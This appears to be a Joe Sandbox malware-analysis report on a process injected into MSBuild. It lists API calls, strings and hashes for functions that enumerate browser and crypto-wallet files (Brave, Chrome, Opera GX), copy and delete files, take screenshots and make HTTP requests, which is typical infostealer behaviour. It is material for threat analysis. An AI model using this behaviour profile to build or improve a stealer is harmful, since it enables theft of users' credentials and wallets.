Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 4173076446-1189830961
Opcode ID: 6bc7db03fd3e6de777a60ecc1956de65a2fbde93f045904ad5cf2e6d1527fe4a
Instruction ID: a9b55009a8fcddda8ff4ceb811f1237a8a6c318138ce5e2e0b09e31f0378cf4a
Opcode Fuzzy Hash: 6bc7db03fd3e6de777a60ecc1956de65a2fbde93f045904ad5cf2e6d1527fe4a
Instruction Fuzzy Hash: 78422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

Function 6C4935A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C51F688,00001000), ref: 6C4935D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4935E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C4935FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C49363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C49369F
__aulldiv.LIBCMT ref: 6C4936E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C493773
EnterCriticalSection.KERNEL32(6C51F688), ref: 6C49377E
LeaveCriticalSection.KERNEL32(6C51F688), ref: 6C4937BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C4937C4
EnterCriticalSection.KERNEL32(6C51F688), ref: 6C4937CB
LeaveCriticalSection.KERNEL32(6C51F688), ref: 6C493801
__aulldiv.LIBCMT ref: 6C493883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C493902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C493918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C49394C

Strings

GenuntelineI, xrefs: 6C493639
GTC, xrefs: 6C493912
AuthcAMDenti, xrefs: 6C493946
MOZ_TIMESTAMP_MODE, xrefs: 6C4935DB
QPC, xrefs: 6C4938FC

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 8d7adb01877e179ed937cc9868e3ab2d810cb0c1b7415b1acc4ccc127f537f3a
Instruction ID: 5b0adc64c00ff50a2658be3ce5f2251880c0e2de977bd5b1aa2a8934e7364c8c
Opcode Fuzzy Hash: 8d7adb01877e179ed937cc9868e3ab2d810cb0c1b7415b1acc4ccc127f537f3a
Instruction Fuzzy Hash: D1B1B5B5B083109FDB08DF28CC5AB1A7BF5AB8A704F068A2DE499D3B50D7709801CB95

Function 00415FD1 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00416018
FindFirstFileA.KERNEL32(?,?), ref: 0041602F
StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
wsprintfA.USER32 ref: 00416091
StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
wsprintfA.USER32 ref: 004160C2
wsprintfA.USER32 ref: 004160D9
PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
lstrcatA.KERNEL32(?), ref: 00416125
lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
lstrcatA.KERNEL32(?,?), ref: 0041614A
lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
lstrcatA.KERNEL32(?,?), ref: 00416170
CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
DeleteFileA.KERNEL32(?), ref: 0041629D
FindNextFileA.KERNEL32(?,?), ref: 004162FF
FindClose.KERNEL32(?), ref: 00416313

Strings

%s\%s, xrefs: 0041608B
%s\*, xrefs: 0041600C
%s\%s, xrefs: 004160D3

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 2178766154-445461498
Opcode ID: 6ae935164d3feafb997cd558fd705644e50460ea22fb7019366a12ba31212e16
Instruction ID: 81d09dce4b51b3523f7962b1b768db3a72bb21831e5d2f1ad6ac3091453fc6b6
Opcode Fuzzy Hash: 6ae935164d3feafb997cd558fd705644e50460ea22fb7019366a12ba31212e16
Instruction Fuzzy Hash: 3E81287190022DABCF60EF61DC45ACD77B9FB08305F0194EAE549A3150EE39AB898F94

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B018,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Strings

Unknown, xrefs: 0041196A
Select * From Win32_OperatingSystem, xrefs: 00411895
Unknown, xrefs: 00411985
Unknown, xrefs: 00411971
%d/%d/%d %d:%d:%d, xrefs: 00411943
WQL, xrefs: 0041189A
InstallDate, xrefs: 004118ED
ROOT\CIMV2, xrefs: 00411862

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: 4a998e0831886b93ed92c0276ff9e06964fee6d6e5f1487c865c121be33c5c48
Instruction ID: 99ef6883476e7e72b4c9cbd85dd5ecdaeb76e40d083b236b73c3eff291e47a74
Opcode Fuzzy Hash: 4a998e0831886b93ed92c0276ff9e06964fee6d6e5f1487c865c121be33c5c48
Instruction Fuzzy Hash: 49416C71940209BBCB10DBD5DC89EEFBBBDEB89B11F20411AF611A6190D6799941CB38

Function 0041C585 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 0041C638
UT, xrefs: 0041C8B0

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 529ba8237f0014992bab19239517a34075ee691daa6caaefc8e8a53a834a0c09
Instruction ID: ceb82e4e54f3846e9f94eab9f0bc1a81f9160b51cd409ffa36bf36e6f1d1d03f
Opcode Fuzzy Hash: 529ba8237f0014992bab19239517a34075ee691daa6caaefc8e8a53a834a0c09
Instruction Fuzzy Hash: 55027EB19442688BDF21CF64CC817EEBBB5AF45304F1440EAD949AB242D6389EC5CF99

Function 00406963 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Strings

hhA, xrefs: 00406976
GET, xrefs: 00406A42
ERROR, xrefs: 00406BAB
ERROR, xrefs: 00406AB6

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET$hhA
API String ID: 3863758870-1019273260
Opcode ID: 1dec5c7d34d4585141b5b241077a9f93a23154a041da39e02d728523565d649f
Instruction ID: b8be4e115d185e019c2f990b7d5ff4e2311a6bf9c79d427f1dbcd116f6077eb1
Opcode Fuzzy Hash: 1dec5c7d34d4585141b5b241077a9f93a23154a041da39e02d728523565d649f
Instruction Fuzzy Hash: C551ADB1A00269AFDF20EB60DC84AEEB7B9FB04304F0180B6F549B2190DA755EC59F94

Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
CloseWindow.USER32(00000000), ref: 004120EF

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 2610876673-0
Opcode ID: 785c2575682d8d340d2f67ba17a8d5b3d83946c3163a7e1a1560ca7ccc0c905a
Instruction ID: c1d95bee058df7d0eb72bc71505ae5be25a1286d1fed2c65958a37403167da66
Opcode Fuzzy Hash: 785c2575682d8d340d2f67ba17a8d5b3d83946c3163a7e1a1560ca7ccc0c905a
Instruction Fuzzy Hash: A251EA72800218AFDF15EFA1ED498EE7FBAFF08315F145425F901E2120E7369A55DB61

Function 00401D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043AA64,0043AA68,004369EE,004369EB,00417A18,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043AA6C), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043AA70), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043AA74,0043AA78,?,0043AA7C,004369EF), ref: 004020DD
CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

DeleteFileA.KERNEL32(?), ref: 00402336
FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

DeleteFileA.KERNEL32(?), ref: 0040264F

Part of subcall function 00416FA7: Sleep.KERNEL32(000003E8,?,?), ref: 0041700E

FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1475085387-1173974218
Opcode ID: dbc9c42cc116f20805c39137913628541fc3833159004567a67bc6b1f21b8684
Instruction ID: 6e187b3dd7c688dd3e2975bf598ceb31540ecf4cce5f896a17779636691c6a6b
Opcode Fuzzy Hash: dbc9c42cc116f20805c39137913628541fc3833159004567a67bc6b1f21b8684
Instruction Fuzzy Hash: 1A320E71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB8AFC98F98

Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041546A
FindFirstFileA.KERNEL32(?,?), ref: 00415481
StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
lstrcatA.KERNEL32(?), ref: 0041550D
lstrcatA.KERNEL32(?), ref: 00415520
lstrcatA.KERNEL32(?,?), ref: 00415534
lstrcatA.KERNEL32(?,?), ref: 00415547
lstrcatA.KERNEL32(?,00436A88), ref: 00415559
lstrcatA.KERNEL32(?,?), ref: 0041556D

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

FindNextFileA.KERNEL32(?,?), ref: 00415623
FindClose.KERNEL32(?), ref: 00415637

Strings

%s\%s, xrefs: 0041545E

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 64224958b159b6d22f10ba55480620843db225054c2a355b86054d57ffa9fb44
